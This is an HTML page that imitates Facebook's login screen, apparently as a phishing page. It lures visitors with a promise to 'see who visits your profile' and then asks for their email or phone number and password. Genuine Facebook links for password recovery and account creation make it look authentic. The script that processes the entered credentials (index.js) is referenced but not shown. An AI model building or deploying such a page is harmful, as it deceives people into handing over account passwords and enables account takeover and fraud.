<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="shortcut icon" href="facebook_icon-icons.com_59205.ico">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <script src="index.js" defer></script>
    <title>Facebook visitors</title>
</head>

<body>
    <main>
        <div id="info">
            <h1>facebook</h1>
            <p>Facebook visitors <br> See who visits your profile</p>
        </div>
     <div id="form">
        <h2><strong>Log in</strong> to continue</h2>
             <input id="username" type="email" placeholder="Email or Phone Number">
             <input id="password" type="password" placeholder="Password">
             <button> Log In</button>
            <p><a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">Forgot Password?</a></p>
             <button class="create"><a style="text-decoration: none; color: #fff;" href="https://www.facebook.com/r.php">Create New Account</a></button>

     </div>
    </main>

</body>

</html>